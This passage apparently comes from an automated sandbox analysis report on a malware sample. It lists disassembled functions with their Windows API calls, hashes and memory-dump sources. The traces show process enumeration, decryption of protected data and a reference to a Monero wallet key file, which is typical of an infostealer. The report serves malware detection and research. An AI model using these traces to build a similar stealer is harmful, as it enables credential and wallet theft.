                                • Opcode ID: c76a8c59ddf82d3e32218f5c11a416dca6fabe65b6c285fac9de259f13d7c803
                                • Instruction ID: 1f507e54bb8eb10b0e26aadc89155e5b318816fd1d3b2a2f007bacdb9c5fda64
                                • Opcode Fuzzy Hash: c76a8c59ddf82d3e32218f5c11a416dca6fabe65b6c285fac9de259f13d7c803
                                • Instruction Fuzzy Hash: 0301E9B5B40308BBEB20DB94CD4AFAE77B8AB44B04F104154FB45BB2C4D6B5AA018B65
                                Function 00E29600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E2961E
                                • Process32First.KERNEL32(00E30ACA,00000128), ref: 00E29632
                                • Process32Next.KERNEL32(00E30ACA,00000128), ref: 00E29647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00E2965C
                                • CloseHandle.KERNEL32(00E30ACA), ref: 00E2967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 58c2ca9929fc9ed6f161ce61129773d3153e23ad6b2859200a009c46c31b5a93
                                • Instruction ID: 2c755bca91abbb9524114ce39a9a75a54dd2188fd8d5579ea7aeabb70a2bdf4b
                                • Opcode Fuzzy Hash: 58c2ca9929fc9ed6f161ce61129773d3153e23ad6b2859200a009c46c31b5a93
                                • Instruction Fuzzy Hash: DE011E75A00318EBCB24DFA5D948BEEBBF8FF48700F105288A94AA7240D7399B44CF50
                                Function 00E28680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E305B7), ref: 00E286CA
                                • Process32First.KERNEL32(?,00000128), ref: 00E286DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00E286F3
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • CloseHandle.KERNEL32(?), ref: 00E28761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 8ac7f025ad76df0ecbacd965a7455e859210c301ad7bd0b5259718dd193ca2dd
                                • Instruction ID: d966febd2f65466e380628eb2fd14e2c183fac0d70b6b9e6af5ae9c5df6406b2
                                • Opcode Fuzzy Hash: 8ac7f025ad76df0ecbacd965a7455e859210c301ad7bd0b5259718dd193ca2dd
                                • Instruction Fuzzy Hash: 64315E71901228EBCB28DF50EC45FEEB7B8FB44700F1041A9F50AB2190DB746A45CFA1
                                Function 00E28EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00E15184,40000001,00000000,00000000,?,00E15184), ref: 00E28EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1f3580ddfe000a62680cc6e9599fedcdc4a0d7fd7dffb3802949da62d19c8c
                                • Instruction ID: c1f206107feb7b2944921aba7746038a308ac83e89c1e8479ddff491fe48822e
                                • Opcode Fuzzy Hash: 7c1f3580ddfe000a62680cc6e9599fedcdc4a0d7fd7dffb3802949da62d19c8c
                                • Instruction Fuzzy Hash: 28110370301208FFEB04CF64EA84FAB37A9AF89314F10A548F9199B244DB35EC41DB60
                                Function 00E27980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E00,00000000,?), ref: 00E279B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E279B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00E30E00,00000000,?), ref: 00E279C4
                                • wsprintfA.USER32 ref: 00E279F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 28a1032d1f06f4ad160b82898875db0eebaf1577111cf3fbdf3d9083ba6790fc
                                • Instruction ID: 4f37ff43601c3aa53936028d9a135c3ae7e162068defd0afac56f370e4abba3b
                                • Opcode Fuzzy Hash: 28a1032d1f06f4ad160b82898875db0eebaf1577111cf3fbdf3d9083ba6790fc
                                • Instruction Fuzzy Hash: 541118B2A04218EACB149FC9E945BBFB7F8FB4CB11F10461AF645A2284D2395940CBB0
                                Function 00E27A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008FD9A0,00000000,?,00E30E10,00000000,?,00000000,00000000), ref: 00E27A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008FD9A0,00000000,?,00E30E10,00000000,?,00000000,00000000,?), ref: 00E27A7D
                                • wsprintfA.USER32 ref: 00E27AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 1bf8ac53643c265a3d0af3a752e13ccd366aa4f66c96de33cb9d2cfd51694f44
                                • Instruction ID: 9282343b54d5c7a24a89ac75bd34b2b351eb50ae960eeddd67a1e417631984f6
                                • Opcode Fuzzy Hash: 1bf8ac53643c265a3d0af3a752e13ccd366aa4f66c96de33cb9d2cfd51694f44
                                • Instruction Fuzzy Hash: D11152B1A45228EBDB208B54DC59FAAB778F744721F104395E516A32C0D7755E40CF51
                                Function 011E0944 Relevance: 5.3, Strings: 3, Instructions: 1593COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $Bt5$$Bt5$2+u
                                • API String ID: 0-2252982423
                                • Opcode ID: cc6031a83a667432ace5132151ef80b45964b5d2f686d965eff0e81eeb7c2efc
                                • Instruction ID: 067d4c6056bdba047b5d2e5721cfe7e82f90f3b61749a41027a5b22f4d7fd4b0
                                • Opcode Fuzzy Hash: cc6031a83a667432ace5132151ef80b45964b5d2f686d965eff0e81eeb7c2efc
                                • Instruction Fuzzy Hash: 2AB2D4F3A0C6109FE308AE29DC8567ABBE5EF94720F16893DEAC5C3744E63558408797
                                Function 011D502C Relevance: 5.3, Strings: 3, Instructions: 1564COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ZAt^$`c]?$g2w
                                • API String ID: 0-3269156922
                                • Opcode ID: fe1cbc57413a2ae66edb0e1d35d599d300bb4b5d375c4177ddfdc1b37184127b
                                • Instruction ID: 4fa7bf646741efee2788e3bf5d307b7ebbf17b01444fb8dc205410251f2b14e8
                                • Opcode Fuzzy Hash: fe1cbc57413a2ae66edb0e1d35d599d300bb4b5d375c4177ddfdc1b37184127b
                                • Instruction Fuzzy Hash: 3FB2E2F360C6049FE708AE2DEC8567AFBE5EF94320F16493DEAC487744EA3558048796
                                Function 00E23720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00E2E118,00000000,00000001,00E2E108,00000000), ref: 00E23758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E237B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: c49e455cd0d652ed34fd16a566ab5b0c033516668986c169068b7f59c9254067
                                • Instruction ID: abeb8d47390466496da7a8e34d9caf28134b9d1640029bcf1efa74ed748483a3
                                • Opcode Fuzzy Hash: c49e455cd0d652ed34fd16a566ab5b0c033516668986c169068b7f59c9254067
                                • Instruction Fuzzy Hash: EF410971A00A2C9FDB28DB58DC94B9BB7B5BB48702F4051D8E609EB2D0E7716E85CF50
                                Function 00E19B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E19B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E19BA3
                                • LocalFree.KERNEL32(?), ref: 00E19BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 7a5ba16658b5e29367fc5dace9ebdccf6eb2913ab3b98d81a2d5f9ce7a005dd8
                                • Instruction ID: c3add8691d038afb6e3ff95acdb4169060e5946209795c1edd566606d2342a37
                                • Opcode Fuzzy Hash: 7a5ba16658b5e29367fc5dace9ebdccf6eb2913ab3b98d81a2d5f9ce7a005dd8
                                • Instruction Fuzzy Hash: 5811F7B8A00209EFDB04DF94D989EAE77B5FF88300F104598E915A7380D775AE50CFA1
                                Function 011ECAC7 Relevance: 3.8, Strings: 2, Instructions: 1263COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: NG_Q$a*N
                                • API String ID: 0-2983026385
                                • Opcode ID: 2af4a32d5df84fa84541de3a463004e6c2043251a3743f033f706457eeb6ba84
                                • Instruction ID: 38990c72d37c82fe4e45496ec73700fc75addd968a7f4540e55ca4f44b03d305
                                • Opcode Fuzzy Hash: 2af4a32d5df84fa84541de3a463004e6c2043251a3743f033f706457eeb6ba84
                                • Instruction Fuzzy Hash: 8092D3F3A082009FE714AE2DEC8567ABBE5EF94720F1A493DEAC5C7344E63558018797
                                Function 01190E95 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m0o$?v
                                • API String ID: 0-2276714564
                                • Opcode ID: 528501d093106100ea44b1c5e07491e36a32c20cb221d20ea9cc4e08ff377120
